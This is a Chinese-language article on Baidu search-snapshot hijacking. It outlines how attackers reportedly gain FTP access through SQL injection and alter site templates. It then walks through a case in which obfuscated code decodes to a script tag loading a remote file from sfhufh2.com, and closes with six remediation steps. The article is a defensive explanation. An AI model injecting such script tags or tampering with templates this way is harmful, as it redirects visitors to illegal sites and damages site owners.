百度快照劫持也就是搜索引擎抓取的是你正常网站的快照，但通过搜索关键词点击进入网站之后跳转到另一个网站（一般都是跳转非法网站），说白了也就是你所看到的网站和搜索引擎看到的网站是不一样的。

百度快照劫持的原理解析

说白了百度快照劫持也不是什么高难度操作，多半是知道了您网站的FTP地址，在凌晨1点到5点之间修改了您的网站模板文件，然后投诉让蜘蛛抓取。然后5点后再修改回去，避免站长发现。

获取您FTP登录地址与账号多半采用的SQL注入方法，所以建站时候我们要有意识的避免网站被SQL注入。

案例类似这种：

网站一旦遇到快照劫持，首先第一反应就是系统检查网站代码

Ctrl+u查看源码：

可以看到<title>标签和<meta name=“”>标签使用了unicode编码

解码出来和网站打开后的网站名称是相同的：

然后再看到

很明显是被串改了；

这个if(……)一系列的作用就是当你使用搜索这个网站，那么网站标题是图片上这个

并且啊，搜索引擎收录的也是这个恶意title

接着查看：

查了一下String.fromCharCode()（不懂就得查~~）

静态String.fromCharCode()方法返回由指定的UTF-16代码单元序列创建的字符串。

解密出来为：

>"<scriptsrc="https://sfhufh2.com/dd.js"></script>"

访问https://sfhufh2点com/dd.js

第一步：立即停止网站服务，避免用户继续受影响，防止继续影响其他站点（建议使用503返回码）。

第二步：重点查看网站模板，特别是<head>标签页，是否有多余的代码。

第三步：检查网站根目录的文件夹，查看是否有多出来的文件或者网页文本，有的话立马删除。

第四步：分析系统和服务器日志，检查自己站点的页面数量、用户访问流量等是否有异常波动，是否存在异常访问或操作日志。

第五步：快照被劫持一般大多数都是黑客通过你的FTP（对就是FTP你放程序的地方），篡改你网站页面的源文件来达到劫持快照的目的，所以网站空间服务器的安全就尤其重要。FTP密码不定时更新，设置尽量复杂，不要告诉陌生人，服务器选择一般选择信得过的有安全防护的主机。

第六步：关闭MYPHPADMIN等其他在线工具，避免黑客从远程IP去暴力破解密码（只开启MYSQL服务即可），关闭远程连接数据库的入口。